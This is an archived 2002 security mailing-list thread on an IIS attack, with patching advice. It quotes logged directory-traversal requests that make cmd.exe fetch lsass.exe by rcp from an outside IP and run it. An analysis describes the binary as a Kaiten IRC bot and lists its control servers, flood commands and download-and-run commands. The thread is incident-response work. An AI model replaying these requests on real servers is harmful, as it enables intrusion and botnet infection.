Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: new IIS worm? (rcp lsass.exe)

From: zeno <bugtraq () cgisecurity net>
Date: Tue, 24 Sep 2002 17:07:55 -0400 (EDT)

Windows Update from you-know-who actually does what you describe.  I'd
always been leery of it, but tried it out recently when setting up a W2K
test server, and it performed as advertised.  It did take several
iterations to get everything updated, owing to various dependencies.


When I used windows update it downloaded the patches but didn't install them. I had to manually
go through each one. While this isn't a big deal I am looking for something 100 percent automated with
install of the patches. Perhaps I'm missing something I deal mostly with unix.

- zeno




Regards,

John Campbell, CISSP, GCWN
Information Security Engineer
Washington School Information Processing Cooperative
(WSIPC)
Everett, Washington, USA

-----Original Message-----
From: zeno [mailto:bugtraq () cgisecurity net] 
Sent: Tuesday, September 24, 2002 11:29 AM
To: Mark Challender
Cc: 'pj () esec dk'; incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)




Hardening of IIS with the tools available at Microsoft and using 
URLSCAN with the EXE blocking on will stop these attacks.

Patch, patch, patch, recheck the patches and use URLSCAN!


Does anyone know of a gui windows tool that scans your system and
provides you with a list of needed patches, and then allows you to
select, and have it autodownload and install them? I can't seem to find
one (needed mostly for iis).

- zeno () cgisecurity com
 




Mark Challender
Network Administrator

==================
Veni, Vidi, Geeki
==================


-----Original Message-----
From: pj () esec dk [mailto:pj () esec dk]
Sent: Monday, September 23, 2002 3:27 AM
To: incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)



Christian Mock:


Then it seems to go after the web servers, sending the following:



GET

/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsas
s.exe+
.
 HTTP/1.0..


and



GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0



I've been able to get hold of that lsass.exe binary (9728 bytes), but



I lack the skills to analyze it; I'll happily mail it to anybody who 
asks.



We have seen this attack from 4 different sources since Sept. 16, and 
have informed the owner of 64.21.95.7 and downloaded the lsass.exe for



investigation.

Based on the attack rate this is most likely a scripted or manual 
attack, not a worm.

Judging from  the embedded string in this compressed binary  it 
appears to be an IRC bot  based on the kaiten.c code written by 
contem@efnet, the author of the Slapper worm :

Kaiten Win32 API version 2002 by contem@efnet

The binary  contains these domainnames, most likeky IRC servers used 
for controlling the bot:

telsa5.mine.nu (Korea)
irc.logicfive.net (Taiwan)
moncredo.shacknet.nu (USA)
telsacredo.shacknet.nu (USA)
lar.ath.cx (Taiwan)

The program accepts commands to make various DOS attacks or download 
new version or executables with http:

NOTICE %s :PUSH <target> <port> <secs>   = A push flooder
NOTICE %s :TCP <target> <port> <secs>    = A syn flooder
NOTICE %s :UDP <target> <port> <secs>    = A udp flooder
NOTICE %s :MCON <target> <port> <times>  = A connectbomb flooder
NOTICE %s :NICK <nick>                   = Changes the nick of the

client

NOTICE %s :DISABLE <pass>                = Disables all packeting from

this

client
NOTICE %s :ENABLE <pass>                 = Enables all packeting from

this

client
NOTICE %s :UPDATE <http address>         = Downloads a file off the

web and

updates the client
NOTICE %s :RUN <http address>            = Downloads a file off the

web and

runs it
NOTICE %s :GET <http address>            = Downloads a file off the

web

NOTICE %s :ADDSERVER <server>            = Adds a server to the list
NOTICE %s :DELSERVER <server>            = Deletes a server from the

list

NOTICE %s :LISTSERVERS                   = Lists server on the list
NOTICE %s :KILL                          = Kills the client
NOTICE %s :VERSION                       = Requests version of client
NOTICE %s :HELP                          = Displays this


There seems also to be a default account and password in the german 
language included in this specific version of Kaiten.

The IIS attack that tries to inject this Trojan usually has another 
URL with "CONNECT chat.vtm.be:6667".  This is an attempt to proxy an 
connection to port 6667(IRC) on chat.vtm.be.



Peter Jelver
...

eSec A/S

http://www.esec.dk 
......................................................................
......
.

PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F  E687 BB8A 128F D85C A7D7





----------------------------------------------------------------------
------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------
------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com





------------------------------------------------------------------------
----
This list is provided by the SecurityFocus ARIS analyzer service. For
more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com





----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: